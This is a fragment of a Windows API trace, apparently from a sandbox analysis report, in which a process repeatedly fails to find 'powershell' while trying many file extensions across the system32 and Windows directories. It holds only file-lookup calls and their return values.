	[0661.411] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0661.411] SetErrorMode (uMode=0x1) returned 0x1
	[0661.411] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0661.420] SetErrorMode (uMode=0x1) returned 0x1
	[0661.421] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0661.421] SetErrorMode (uMode=0x1) returned 0x1
	[0661.421] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0663.066] SetErrorMode (uMode=0x1) returned 0x1
	[0663.068] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0663.068] SetErrorMode (uMode=0x1) returned 0x1
	[0663.068] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0663.076] SetErrorMode (uMode=0x1) returned 0x1
	[0663.078] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0663.078] SetErrorMode (uMode=0x1) returned 0x1
	[0663.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0663.087] SetErrorMode (uMode=0x1) returned 0x1
	[0663.088] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0663.088] SetErrorMode (uMode=0x1) returned 0x1
	[0663.088] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0663.097] SetErrorMode (uMode=0x1) returned 0x1
	[0663.099] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0663.099] SetErrorMode (uMode=0x1) returned 0x1
	[0663.099] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0663.108] SetErrorMode (uMode=0x1) returned 0x1
	[0663.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0663.110] SetErrorMode (uMode=0x1) returned 0x1
	[0663.110] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.627] SetErrorMode (uMode=0x1) returned 0x1
	[0664.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.628] SetErrorMode (uMode=0x1) returned 0x1
	[0664.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.628] SetErrorMode (uMode=0x1) returned 0x1
	[0664.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.628] SetErrorMode (uMode=0x1) returned 0x1
	[0664.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.629] SetErrorMode (uMode=0x1) returned 0x1
	[0664.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.629] SetErrorMode (uMode=0x1) returned 0x1
	[0664.629] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.629] SetErrorMode (uMode=0x1) returned 0x1
	[0664.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.630] SetErrorMode (uMode=0x1) returned 0x1
	[0664.630] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.630] SetErrorMode (uMode=0x1) returned 0x1
	[0664.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.630] SetErrorMode (uMode=0x1) returned 0x1
	[0664.630] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.631] SetErrorMode (uMode=0x1) returned 0x1
	[0664.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.631] SetErrorMode (uMode=0x1) returned 0x1
	[0664.631] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.631] SetErrorMode (uMode=0x1) returned 0x1
	[0664.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.632] SetErrorMode (uMode=0x1) returned 0x1
	[0664.632] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.632] SetErrorMode (uMode=0x1) returned 0x1
	[0664.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.632] SetErrorMode (uMode=0x1) returned 0x1
	[0664.632] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.633] SetErrorMode (uMode=0x1) returned 0x1
	[0664.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.633] SetErrorMode (uMode=0x1) returned 0x1
	[0664.633] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.633] SetErrorMode (uMode=0x1) returned 0x1
	[0664.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.633] SetErrorMode (uMode=0x1) returned 0x1
	[0664.634] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.634] SetErrorMode (uMode=0x1) returned 0x1
	[0664.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.634] SetErrorMode (uMode=0x1) returned 0x1
	[0664.634] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.634] SetErrorMode (uMode=0x1) returned 0x1
	[0664.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.635] SetErrorMode (uMode=0x1) returned 0x1
	[0664.635] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.635] SetErrorMode (uMode=0x1) returned 0x1
	[0664.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.635] SetErrorMode (uMode=0x1) returned 0x1
	[0664.635] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.636] SetErrorMode (uMode=0x1) returned 0x1
	[0664.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0664.636] SetErrorMode (uMode=0x1) returned 0x1
	[0664.636] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.636] SetErrorMode (uMode=0x1) returned 0x1
	[0664.636] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.637] SetErrorMode (uMode=0x1) returned 0x1
	[0664.637] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.637] SetErrorMode (uMode=0x1) returned 0x1
	[0664.637] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.637] SetErrorMode (uMode=0x1) returned 0x1
	[0664.637] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.638] SetErrorMode (uMode=0x1) returned 0x1
	[0664.638] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.638] SetErrorMode (uMode=0x1) returned 0x1
	[0664.638] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.638] SetErrorMode (uMode=0x1) returned 0x1
	[0664.638] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.639] SetErrorMode (uMode=0x1) returned 0x1
	[0664.639] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.639] SetErrorMode (uMode=0x1) returned 0x1
	[0664.639] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.639] SetErrorMode (uMode=0x1) returned 0x1
	[0664.639] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.640] SetErrorMode (uMode=0x1) returned 0x1
	[0664.640] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.640] SetErrorMode (uMode=0x1) returned 0x1
	[0664.640] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.640] SetErrorMode (uMode=0x1) returned 0x1
	[0664.640] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.641] SetErrorMode (uMode=0x1) returned 0x1
	[0664.641] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.641] SetErrorMode (uMode=0x1) returned 0x1
	[0664.641] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.641] SetErrorMode (uMode=0x1) returned 0x1
	[0664.641] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.642] SetErrorMode (uMode=0x1) returned 0x1
	[0664.642] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.642] SetErrorMode (uMode=0x1) returned 0x1
	[0664.642] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.642] SetErrorMode (uMode=0x1) returned 0x1
